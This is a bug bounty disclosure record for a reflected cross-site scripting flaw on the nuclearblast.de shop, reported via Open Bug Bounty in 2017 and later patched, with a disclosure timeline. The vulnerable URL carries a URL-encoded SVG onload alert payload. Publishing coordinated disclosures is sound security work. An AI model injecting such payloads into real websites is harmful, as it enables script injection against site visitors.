nuclearblast.de XSS vulnerability

2017-01-13T15:55:00
ID OBB:206106
Type openbugbounty
Reporter amlnspqr
Modified 2017-08-28T08:59:00

Description

Vulnerable URL:
http://www.nuclearblast.de/de/shop/artikel/gruppen/51000.1.nuclearblast.html?article_group_sort_type_handle=rank&custom;_keywords=%22%3E%3Csvg%20onload=alert(/XSSPOSED/)%3E
Details:

Description| Value
---|---
Patched:| Yes, at 27.08.2017
Latest check for patch:| 27.08.2017 16:41 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 58865
VIP website status:| No
Check nuclearblast.de SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 January, 2017 15:55 GMT
Generic security notifications sent to website owner| 13 January, 2017 15:58 GMT
Vulnerability details disclosed by researcher| 27 January, 2017 16:14 GMT
Vulnerability patched by the website owner| 28 August, 2017 08:59 GMT